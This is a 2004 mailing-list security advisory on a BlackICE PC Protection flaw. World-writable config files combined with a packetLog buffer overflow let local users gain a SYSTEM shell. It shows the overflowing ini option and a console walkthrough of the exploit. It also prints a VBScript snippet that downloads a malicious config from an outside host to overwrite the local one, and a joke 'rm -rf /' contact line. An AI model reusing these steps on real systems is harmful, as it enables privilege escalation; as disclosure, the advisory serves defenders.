[VulnWatch] SRT2004-01-17-0227 - BlackICE allows local users to become SYSTEM

From: KF (dotslash_at_snosoft.com)
Date: 01/28/04

  • Next message: Matthias Andree: "[VulnWatch] Security Announcement: untrusted ELF library path in some cvsup binary RPMs"
    Date: Tue, 27 Jan 2004 21:36:46 -0500
    To: bugtraq@securityfocus.com


    Secure Network Operations, Inc. http://www.secnetops.com/research
    Strategic Reconnaissance Team research[at]secnetops[.]com
    Team Lead Contact kf[at]secnetops[.]com
    Spam Contact `rm -rf /`@snosoft.com

    Our Mission:
    Secure Network Operations offers expertise in Networking, Intrusion
    Detection Systems (IDS), Software Security Validation, and
    Corporate/Private Network Security. Our mission is to facilitate a
    secure and reliable Internet and inter-enterprise communications
    infrastructure through the products and services we offer.

    To learn more about our company, products and services or to request a
    demo of ANVIL FCS please visit our site at http://www.secnetops.com, or
    call us at: 978-263-3829

    Quick Summary:
    Advisory Number : SRT2004-01-17-0227
    Product : BlackICE PC Protection
    Version : <= 3.6.cbz ?
    Vendor : http://blackice.iss.net/product_pc_protection.php
    Class : Local
    Criticality : Low to Medium
    Operating System(s) : Win32

    1-2 day Early Warning List:
    Secure Network Operations, inc. will very shortly have its own advisory
    notification mailing list. This list will notify you of advisories 1-2
    days in advance of public release to other mailing lists. To subscribe
    please visit http://advisories.secnetops.com in the immediate future.

    30-60 day Early Warning List:
    Our early warning service will notify you of new vulnerabilities 30-60
    days in advance of public release. This service has been created to protect
    companies by allowing them to repair security vulnerabilities before they
    become public knowledge. To purchase a one year subscription to this
    service please contact us at 978-263-3767.

    Our advisories will contain full details excluding a working Proof of
    Concept. Our web page will contain our working proof of concept for the
    advisory if it exists. Yes folks this is a policy change for us. We
    will exercise our own discretion in regards to delay of exploit release
    vs advisory release. List subscribers will have advanced access to working
    proof of concept code depending on the severity and list subscription type.

    Basic Explanation
    High Level Description : BlackICE allows local users to become SYSTEM.
    What to do : Enable BlackICE Application Protection or upgrade.

    Basic Technical Details
    Proof Of Concept Status : Proof of concept is attached to this advisory.

    Low Level Description : BlackICE products provide Intrusion Detection,
    personal firewall, and application protection all in one easy to use package.
    The technology behind BlackICE goes beyond basic file scanning to actually
    monitoring ongoing system activity and communications so that it can
    automatically stop suspect activity before it can harm your system.
    Based on vendor documentation BlackICE will run on the following systems:
    Windows 98 (retail, SP1, Second Edition), Windows NT 4 (SP5, SP6, SP6a),
    Windows 2000 (SP1, SP2, SP3), Windows Me, and Windows XP Pro (SP1) / Home
    (SP1). Please note that the suggested browser versions (Internet Explorer
    5.0 or greater) depending on patch level may aid in facilitating the below
    mentioned attack scenarios. Please see http://die.leox.com/ie_unpatched/index.html

    The following text is a documentation of my personal experience with BlackICE.
    This text may or may not reflect your experience with BlackICE products. My
    testing and research was done using a random copy of a BlackICE eval
    (BIDEvalSetup27360.exe) that was lying around on an internal file share. I
    took all defaults while installing BlackICE. After clicking next, next, next...
    all the way through the install I ended up with:

    Network ICE BlackICE Defender Rel 2.5.ch EVALUATION
    . blackdll.dll version 2.5.33
    . blackdrv.sys version 2.5.35 (for Win NT/2000)
    . blackdrv.vxd version 2.5.34 (for Win 95/98/Me)
    . blackd.exe version 2.5.36
    . blackice.exe version 2.5.34

    The original ini files are installed as follows. (This is a GOOD thing)
    Administrator@none /cygdrive/f/Program Files/Network ICE/BlackICE
    $ ls -al *ini
    -rwx------+ 1 Administ None 111 Jan 12 05:59 blackice.ini
    -rwx------+ 1 Administ None 1486 Jan 12 05:59 firewall.ini
    -rwx------+ 1 Administ None 84 Jan 12 05:59 sigs.ini

    You should note that the above files are NOT everyone full control.

    As soon as we open the BlackICE gui we see that there are some nice red
    exclamation marks. In the status window it says [Informational] A firewall
    filter could not be set. Clicking on advICE tells us "To correct this problem,
    make sure you have updated BlackICE to the latest release or patch applicable
    to your operating system".

    That’s fair enough... I have no problem updating my old demo. Next we click on
    tools download update. I just accept all defaults and upgrade to version
    3.6cbz. I have tell it I am still evaluating the product obviously... I am not
    sure if anything changes when you purchase a real version (enter a serial
    number). I have not used any ISS products beyond this particular demo version
    of BlackICE.

    Our version numbers are now:

    Network ICE BlackICE PC Protection Release 3.6.cbz
    . blackdll.dll version 3.6.37
    . BlackDrv.sys version 3.6.37
    . iss-pam1.dll version 3.6.50
    . blackd.exe version 3.6.48
    . blackice.exe version 3.6.44

    After the update to 3.6cbz the local security of our install appears to have
    been downgraded. Above only the Administrator had access to the .ini files. Now
    everyone has full control of them. I feel this causes its own set of security
    issues aside from what we document below.

    Administrator@none /cygdrive/f/Program Files/Network ICE/BlackICE
    $ ls -al *ini
    -rwxrwxrwx+ 1 Administ None 233 Jan 12 06:10 blackice.ini
    -rwxrwxrwx+ 1 Administ None 1605 Jan 12 06:10 firewall.ini
    -rwxrwxrwx+ 1 Administ None 178 Jan 12 06:10 protect.ini
    -rwxrwxrwx+ 1 Administ None 84 Jan 12 06:10 sigs.ini

    The default install options leave Application Protection off... oddly enough I
    had considered turning it on at first but I am a lazy guy, it told me it would
    take "several minutes" to install Application Protection. I was really not
    interested in waiting several minutes. =]

    During the discovery phase there was some disagreement over the various attack
    scenarios. The discussion centered around the multi-user capabilities or lack
    there of in the above mentioned operating systems. So just for the sake of
    argument the machine that I am evaluating BlackICE on is Windows 2000 Server SP4,
    no terminal services are installed (thus classifying the machine for an Enterprise
    BlackICE solution?). The only service on this machine is VNC. VNC is provided
    so that various individuals (not necessarily administrators) can login to this
    machine remotely. The configuration for VNC is set to "Logoff Workstation when
    last client disconnects to provide some level of additional security.

    The point of the below scenarios are to show that the config file permissions
    combined with the buffer overflow in the blackd.exe service can be used in
    conjunction with other attacks to further leverage privileges.

    After the install I have rebooted, the login prompt is on the console, and VNC
    is listening just as it was during the installation. From a remote box I connect
    as a user with minimal rights. Upon connecting via VNC I must send control alt
    del and then login. I now have local access to the machine that I am attempting
    to exploit via remote control software. You should note that NO BlackICE warnings
    were triggered by the VNC connection. Keep in mind that BlackICE has not been
    tweaked beyond its initial configuration either.

    Lets see who we are really quick.

    F:\Documents and Settings\kf>whoami

    A quick netstat shows us the ports that are currently open.

    F:\Documents and Settings\kf>netstat -a

    Active Connections

      Proto Local Address Foreign Address State
      TCP none:epmap none:0 LISTENING
      TCP none:microsoft-ds none:0 LISTENING
      TCP none:1025 none:0 LISTENING
      TCP none:1026 none:0 LISTENING
      TCP none:3389 none:0 LISTENING
      TCP none:netbios-ssn none:0 LISTENING
      UDP none:microsoft-ds *:*
      UDP none:netbios-ns *:*
      UDP none:netbios-dgm *:*

    If you look at task manager you will note that blackd.exe is running as SYSTEM.

    After some toying with the GUI we discovered a buffer overflow in the packetLog
    functionality. The overflow can be triggered with the following .ini options.

    [Packet Logging]
    packetLog.fileprefix=<aaaaa...b0f here...aaaaa>

    A 217 Character log prefix makes BlackICE blackd crash with the EIP and ECX both
    overwritten with user supplied data.

    We simply run the BlackICE exploit that we prepared for the above condition.

    F:\Documents and Settings\kf> perl BlackICEdefender_ex.pl

    Wait a bit for the FileChange Event to trigger, or trigger any alert yourself.
    Ssh traffic seemed like a quick and easy alert to trigger in the event the file
    changes are not detected immediately.

    F:\Program Files\Network ICE\BlackICE>telnet 22
    Connecting To
    SSH-2.0-OpenSSH_3.4p1 Debian 1:3.4p1-1.woody.2.1
                                                    Protocol mismatch.

    Check what’s listening again. You should note the new port 9191 in the list.

    F:\Documents and Settings\kf>netstat -a

    Active Connections

      Proto Local Address Foreign Address State
      TCP none:epmap none:0 LISTENING
      TCP none:microsoft-ds none:0 LISTENING
      TCP none:1025 none:0 LISTENING
      TCP none:1026 none:0 LISTENING
      TCP none:3389 none:0 LISTENING
      TCP none:9191 none:0 LISTENING
      TCP none:netbios-ssn none:0 LISTENING
      UDP none:microsoft-ds *:*
      UDP none:netbios-ns *:*
      UDP none:netbios-dgm *:*

    F:\Documents and Settings\kf>telnet localhost 9191
    Connecting To localhost...

    Microsoft Windows 2000 [Version 5.00.2195]
    (C) Copyright 1985-2000 Microsoft Corp.

    F:\Program Files\Network ICE\BlackICE>whoami

    At this point we pretty much have the equivalent of root access to this
    windows machine.

    With out local access to the machine I feel that it is still quite trivial
    to trigger this vulnerability. A quick trip to http://die.leox.com/ie_unpatched/
    gave me enough to prove the basic point. The following Full-Disclosure post
    outlines the attack and its limitations.


    Obviously the example requires interaction from a victim. I am sure there is no
    shortage on other bugs that could deliver a malicious blackice.ini.

    <script language="vbscript">
    const adTypeBinary = 1
    const adSaveCreateOverwrite = 2
    const adModeReadWrite = 3
    set xmlHTTP = CreateObject("Microsoft.XMLHTTP")
    xmlHTTP.open "GET","http://www.snosoft.com/blackice.ini",false
    contents = xmlHTTP.responseBody
    Set oStr = CreateObject("ADODB.Stream")
    oStr.Mode = adModeReadWrite
    oStr.Type = adTypeBinary
    oStr.SaveToFile "F:\Program Files\Network ICE\BlackICE\blackice.ini", adSaveCreateOverwrite

    Opening the above html file from within the MyComputer zone would cause the
    blackice.ini to be overwritten.

    The final note I have to include on this advisory is that the BlackICE Application
    Protection DOES work... so use it. When the AP is enabled this attack is not
    possible because BlackICE simply will not allow the configfiles to be modified.

    Functional PoC can be located in the archives at http://advisories.secnetops.com

    Vendor Status : Vendor fixes should be available as of 1/27/04

    Bugtraq URL : To be assigned.

    This advisory was released by Secure Network Operations,Inc. as a matter
    of notification to help administrators protect their networks against
    the described vulnerability. Release of exploit code is done at our
    own discretion.
    All content of this advisory is property of Secure Network Operations.
    Secure Network Operations, Inc. || http://www.secnetops.com
    "Embracing the future of technology, protecting you."


  • Next message: Matthias Andree: "[VulnWatch] Security Announcement: untrusted ELF library path in some cvsup binary RPMs"